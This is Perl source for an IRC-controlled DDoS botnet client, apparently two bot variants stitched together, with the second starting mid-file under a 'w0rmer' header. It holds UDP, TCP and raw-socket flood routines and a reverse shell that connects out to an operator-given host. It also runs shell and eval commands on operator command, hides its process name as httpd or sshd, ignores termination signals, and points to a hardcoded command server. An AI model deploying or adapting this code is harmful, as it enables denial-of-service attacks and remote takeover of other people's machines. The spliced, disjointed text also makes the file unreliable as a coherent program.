while (($pacota == "1") && ($pacotes == "1")) {
$pacota = 0 if ((time >= $fim) && ($tempo != "0"));
$pacote=$rand x $rand x $rand;
$porta = int(rand 65000) +1 if ($porta == "0");
send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
}
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Alvo dos Pacotes\002: $1");
}
}
elsif ($funcarg =~ /^udpfaixa\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $faixaip="$1";
my $porta = "$2";
my $tempo = "$3";
my $pacote;
my $pacotes;
my $fim = time + $tempo;
my $pacota = 1;
my $alvo;
while ($pacota == "1") {
$pacota = 0 if ((time >= $fim) && ($tempo != "0"));
for (my $faixa = 1; $faixa <= 255; $faixa++) {
$alvo = inet_aton("$faixaip.$faixa");
$pacote=$rand x $rand x $rand;
$porta = int(rand 65000) +1 if ($porta == "0");
send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
if ($faixa >= 255) {
$faixa = 1;
}
}
}
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Alvo dos Pacotes\002: $alvo");
}
}
# Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p
elsif ($funcarg =~ /^conback\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Conectando-se em\002: $host:$porta");
}
}
elsif ($funcarg =~ /^oldpack\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
unless ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status -\002");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Timp\002: $dtime"."secunde.");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total packet\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} + $pacotes{o}));
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Flood\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
}
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
elsif ($case =~ /^part (.*)/) {
p("$1");
}
elsif ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
elsif ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^voice/) {
voice("$printl", "$kem") if $case eq "voice";
$oarg = substr($case, 6);
voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^devoice/) {
devoice("$printl", "$kem") if $case eq "devoice";
$oarg = substr($case, 8);
devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
elsif ($case =~ /^invite\s+(\S+) (.*)/) {
invite("$1", "$2");
}
elsif ($case =~ /^nick (.*)/) {
nick("$1");
}
elsif ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
elsif ($case =~ /^send\s+(\S+)\s+(\S+)/) {
DCC::SEND("$1", "$2");
}
elsif ($case =~ /^raw (.*)/) {
sendraw("$1");
}
elsif ($case =~ /^eval (.*)/) {
eval "$1";
}
elsif ($case =~ /^entra\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
j("$1");
}
elsif ($case =~ /^sai\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
p("$1");
}
elsif ($case =~ /^sair/) {
quit();
}
elsif ($case =~ /^novonick/) {
my $novonick = getnick();
nick("$novonick");
}
elsif ($case =~ /^estatisticas (.*)/) {
if ($1 eq "on") {
$estatisticas = 1;
msg("$printl", "Estat.sticas ativadas!");
} elsif ($1 eq "off") {
$estatisticas = 0;
msg("$printl", "Estat.sticas desativadas!");
}
}
elsif ($case =~ /^pacotes (.*)/) {
if ($1 eq "on") {
$pacotes = 1;
msg("$printl", "Pacotes ativados!") if ($estatisticas == "1");
} elsif ($1 eq "off") {
$pacotes = 0;
msg("$printl", "Pacotes desativados!") if ($estatisticas == "1");
}
}
}
sub shell {
return unless $acessoshell;
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "Diret.rio inexistente!");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c >= "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
sub attacker {
my $iaddr = inet_aton($_[0]);
my $msg = 'B' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65535; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1);
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1);
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1);
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1);
# DoS ?? :P
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1);
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
#############
# ALIASES #
#############
sub action {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub hop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub dehop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub voice {
return unless $#_ == 1;
sendraw("MODE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ == 1;
sendraw("MODE $_[0] -v $_[1]");
}
sub ban {
return unless $#_ == 1;
sendraw("MODE $_[0] +b $_[1]");
}
sub unban {
return unless $#_ == 1;
sendraw("MODE $_[0] -b $_[1]");
}
sub kick {
return unless $#_ == 1;
sendraw("KICK $_[0] $_[1] :$_[2]");
}
sub modo {
return unless $#_ == 0;
sendraw("MODE $_[0] $_[1]");
}
sub mode { modo(@_); }
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub invite {
return unless $#_ == 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ == 1;
sendraw("TOPIC $_[0] $_[1]");
}
sub topic { topico(@_); }
sub whois {
return unless $#_ == 0;
sendraw("WHOIS $_[0]");
}
sub who {
return unless $#_ == 0;
sendraw("WHO $_[0]");
}
sub names {
return unless $#_ == 0;
sendraw("NAMES $_[0]");
}
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
sub quit {
sendraw("QUIT :$_[0]");
exit;
}
# DCC
package DCC;
sub connections {
my @ready = $dcc_sel->can_read(1);
# return unless (@ready);
foreach my $fh (@ready) {
my $dcctipo = $DCC{$fh}{tipo};
my $arquivo = $DCC{$fh}{arquivo};
my $bytes = $DCC{$fh}{bytes};
my $cur_byte = $DCC{$fh}{curbyte};
my $nick = $DCC{$fh}{nick};
my $msg;
my $nread = sysread($fh, $msg, 10240);
if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
$DCC{$fh}{status} = "Cancelado";
$DCC{$fh}{ftime} = time;
$dcc_sel->remove($fh);
$fh->close;
next;
}
if ($dcctipo eq "get") {
$DCC{$fh}{curbyte} += length($msg);
my $cur_byte = $DCC{$fh}{curbyte};
open(FILE, ">> $arquivo");
print FILE "$msg" if ($cur_byte <= $bytes);
close(FILE);
my $packbyte = pack("N", $cur_byte);
print $fh "$packbyte";
if ($bytes == $cur_byte) {
$dcc_sel->remove($fh);
$fh->close;
$DCC{$fh}{status} = "Recebido";
$DCC{$fh}{ftime} = time;
next;
}
} elsif ($dcctipo eq "send") {
my $send = $fh->accept;
$send->autoflush(1);
$dcc_sel->add($send);
$dcc_sel->remove($fh);
$DCC{$send}{tipo} = 'sendcon';
$DCC{$send}{itime} = time;
$DCC{$send}{nick} = $nick;
$DCC{$send}{bytes} = $bytes;
$DCC{$send}{curbyte} = 0;
$DCC{$send}{arquivo} = $arquivo;
$DCC{$send}{ip} = $send->peerhost;
$DCC{$send}{porta} = $send->peerport;
$DCC{$send}{status} = "Enviando";
#de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
open(FILE, "< $arquivo");
my $fbytes;
read(FILE, $fbytes, 1024);
print $send "$fbytes";
close FILE;
# delete($DCC{$fh});
} elsif ($dcctipo eq 'sendcon') {
my $bytes_sended = unpack("N", $msg);
$DCC{$fh}{curbyte} = $bytes_sended;
if ($bytes_sended == $bytes) {
$fh->close;
$dcc_sel->remove($fh);
$DCC{$fh}{status} = "Enviado";
$DCC{$fh}{ftime} = time;
next;
}
open(SENDFILE, "< $arquivo");
seek(SENDFILE, $bytes_sended, 0);
my $send_bytes;
read(SENDFILE, $send_bytes, 1024);
print $fh "$send_bytes";
close(SENDFILE);
}
}
}
sub SEND {
my ($nick, $arquivo) = @_;
unless (-r "$arquivo") {
return(0);
}
my $dccark = $arquivo;
$dccark =~ s/[.*\/](\S+)/$1/;
my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
my $longip = unpack("N",inet_aton($meuip));
my @filestat = stat($arquivo);
my $size_total=$filestat[7];
if ($size_total == 0) {
return(0);
}
my ($porta, $sendsock);
do {
$porta = int rand(64511);
$porta += 1024;
$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
} until $sendsock;
$DCC{$sendsock}{tipo} = 'send';
$DCC{$sendsock}{nick} = $nick;
$DCC{$sendsock}{bytes} = $size_total;
$DCC{$sendsock}{arquivo} = $arquivo;
&::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
}
sub GET {
my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
return(0) if (-e "$arquivo");
if (open(FILE, "> $arquivo")) {
close FILE;
} else {
return(0);
}
my $dccip=fixaddr($dcclongip);
return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
$dccsock->autoflush(1);
$dcc_sel->add($dccsock);
$DCC{$dccsock}{tipo} = 'get';
$DCC{$dccsock}{itime} = time;
$DCC{$dccsock}{nick} = $nick;
$DCC{$dccsock}{bytes} = $bytes;
$DCC{$dccsock}{curbyte} = 0;
$DCC{$dccsock}{arquivo} = $arquivo;
$DCC{$dccsock}{ip} = $dccip;
$DCC{$dccsock}{porta} = $dccporta;
$DCC{$dccsock}{status} = "Recebendo";
}
# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
sub Status {
my $socket = shift;
my $sock_tipo = $DCC{$socket}{tipo};
unless (lc($sock_tipo) eq "chat") {
my $nick = $DCC{$socket}{nick};
my $arquivo = $DCC{$socket}{arquivo};
my $itime = $DCC{$socket}{itime};
my $ftime = time;
my $status = $DCC{$socket}{status};
$ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
my $d_time = $ftime-$itime;
my $cur_byte = $DCC{$socket}{curbyte};
my $bytes_total = $DCC{$socket}{bytes};
my $rate = 0;
$rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
my $porcen = ($cur_byte*100)/$bytes_total;
my ($r_duv, $p_duv);
if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
$r_duv = $3; $r_duv++ if $4 >= 5;
$rate = "$1\.$2"."$r_duv";
}
if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
$p_duv = $3; $p_duv++ if $4 >= 5;
$porcen = "$1\.$2"."$p_duv";
}
return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
}
return(0);
}
# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
sub fixaddr {
my ($address) = @_;
chomp $address; # just in case, sigh.
if ($address =~ /^\d+$/) {
return inet_ntoa(pack "N", $address);
} elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
return $address;
} elsif ($address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
return inet_ntoa(((gethostbyname($address))[4])[0]);
} else {
return;
}
}
#!/usr/bin/perl
system("echo INFECTED");
######################################################################################################################
######################################################################################################################
## DDoS Perl IrcBot v1.0 / 2012 by w0rmer Security Team ## [ Help ] #########################################
## Stealth MultiFunctional IrcBot writen in Perl #######################################################
## Teste on every system with PERL instlled ## !u @system ##
## ## !u @version ##
## This is a free program used on your own risk. ## !u @channel ##
## Created for educational purpose only. ## !u @flood ##
## I'm not responsible for the illegal use of this program. ## !u @utils ##
######################################################################################################################
## [ Channel ] #################### [ Flood ] ################################## [ Utils ] ###########################
######################################################################################################################
## !u @join <#channel> ## !u @udp1 <ip> <port> <time> ## !u @cback <ip> <port> ##
## !u @part <#channel> ## !u @udp2 <ip> <packet size> <time> ## !u @downlod <url+path> <file> ##
## !u !uejoin <#channel> ## !u @udp3 <ip> <port> <time> ## !u @portscan <ip> ##
## !u !op <channel> <nick> ## !u @tcp <ip> <port> <packet size> <time> ## !u @mail <subject> <sender> ##
## !u !deop <channel> <nick> ## !u @http <site> <time> ## <recipient> <message> ##
## !u !voice <channel> <nick> ## ## !u pwd;uname -a;id <for example> ##
## !u !devoice <channel> <nick> ## !u @ctcpflood <nick> ## !u @port <ip> <port> ##
## !u !nick <newnick> ## !u @msgflood <nick> ## !u @dns <ip/host> ##
## !u !msg <nick> ## !u @noticeflood <nick> ## ##
## !u !quit ## ## ##
## !u !uaw ## ## ##
## !u @die ## ## ##
## ## ## ##
######################################################################################################################
######################################################################################################################
#############################
##### [ Configuration ] #####
#############################
my @rps = ("/usr/local/apache/bin/httpd -DSSL",
"/usr/sbin/httpd -k start -DSSL",
"/usr/sbin/httpd",
"/usr/sbin/sshd -i",
"/usr/sbin/sshd",
"/usr/sbin/sshd -D",
"/usr/sbin/apache2 -k start",
"/sbin/syslogd",
"/sbin/klogd -c 1 -x -x",
"/usr/sbin/acpid",
"/usr/sbin/cron");
my $process = $rps[rand scalar @rps];
my @rversion = ("James ®");
my $vers = $rversion[rand scalar @rversion];
my @rircname = ("sex");
my $ircname = $rircname[rand scalar @rircname];
chop (my $realname = $rircname[rand scalar @rircname]);
my $nick =$rircname[rand scalar @rircname];
$server = '164.92.142.65' unless $server;
my $port = '6666';
my $linas_max='8';
my $sleep='5';
my $homedir = "/tmp";
my $version = 'irc bot by James ®';
my @admins = ("Nite","Nite2","Nite3");
my @hostauth = ("Nite");
my @channels = ("#sex");
my $pacotes = 1;
#################################################################
##### [ Stop Editing if you dont know what are you doing. ] #####
#################################################################
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use Socket;
use IO::Socket;
use IO::Socket::INET;
use IO::Select;
chdir("$homedir");
$server="$ARGV[0]" if $ARGV[0];
$0="$process"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Can't fork in background: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub getstore ($$)
{
my $url = shift;
my $file = shift;
$http_stream_out = 1;
open(GET_OUTFILE, "> $file");
%http_loop_check = ();
_get($url);
close GET_OUTFILE;
return $main::http_get_result;
}
sub _get
{
my $url = shift;
my $proxy = "";
grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {
my $host = $1;
my $port = $2 || 80;
my $path = $3;
$path = "/" unless defined($path);
return _trivial_http_get($host, $port, $path);
} elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {
my $host = $1;
my $port = $2;
my $path = $url;
return _trivial_http_get($host, $port, $path);
} else {
return undef;
}
}
sub _trivial_http_get
{
my($host, $port, $path) = @_;
my($AGENT, $VERSION, $p);
$AGENT = "get-minimal";
$VERSION = "20000118";
$path =~ s/ /%20/g;
require IO::Socket;
local($^W) = 0;
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Timeout => 60) || return;
$sock->autoflush;
my $netloc = $host;
$netloc .= ":$port" if $port != 80;
my $request = "GET $path HTTP/1.0\015\012"
. "Host: $netloc\015\012"
. "User-Agent: $AGENT/$VERSION/u\015\012";
$request .= "Pragma: no-cache\015\012" if ($main::http_no_cache);
$request .= "\015\012";
print $sock $request;
my $buf = "";
my $n;
my $b1 = "";
while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
if ($b1 eq "") {
$b1 = $buf;
$buf =~ s/.+?\015?\012\015?\012//s;
}
if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
}
return undef unless defined($n);
$main::http_get_result = 200;
if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {
$main::http_get_result = $1;
if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/) {
my $url = $1;
return undef if $http_loop_check{$url}++;
return _get($url);
}
return undef unless $main::http_get_result =~ /^2/;
}
return $buf;
}
sub conectar {
my $meunick = $_[0];
my $server_con = $_[1];
my $port_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con",
PeerPort=>$port_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$server_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$port_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$server", "$port"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "".$vers."");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @admins ) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!u)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1");
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick-".int rand(9999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@channels) {
sendraw("MODE $nick +iw");
sendraw("JOIN $canal");
sendraw("PRIVMSG $canal :=> oi blea, m-o prins...");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
###########################
##### [ Help Module ] #####
###########################
if ($funcarg =~ /^help/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1======================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1w0rmer PerlBot Main Help: ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1======================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1system ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1version ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1channel ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1flood ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1utils ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1======================= ");
}
if ($funcarg =~ /^system/) {
$uptime=`uptime`;
$ownd=`pwd`;
$id=`id`;
$uname=`uname -srp`;
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1=================== ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1Bot Configuration: ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1=================== ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*Server : 12$server ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*Port : 12$port ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*Channels : 12@channels ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*uname -a : 12$uname ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*uptime : 12$uptime ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*FakeProcess : 12$process ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*ProcessPID : 12$$ ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*ID : 12$id ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*Own Dir : 12$ownd ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1=================== ");
}
if ($funcarg =~ /^version/){
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1================================== ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1Bot Informations: ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1================================== ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1*Bot Version : 12$version ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1*Bot Creator 0rmer ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1*Bot Year : 122012 ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1================================== ");
}
if ($funcarg =~ /^flood/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1w0rmer PerlBot Flood Help: ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp1 <ip> <port> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp2 <ip> <packet size> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp3 <ip> <port> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1tcp <ip> <port> <packet size> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1http <site> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1ctcpflood <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1msgflood <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1noticeflood <nick> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
}
if ($funcarg =~ /^channel/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1============================= ");
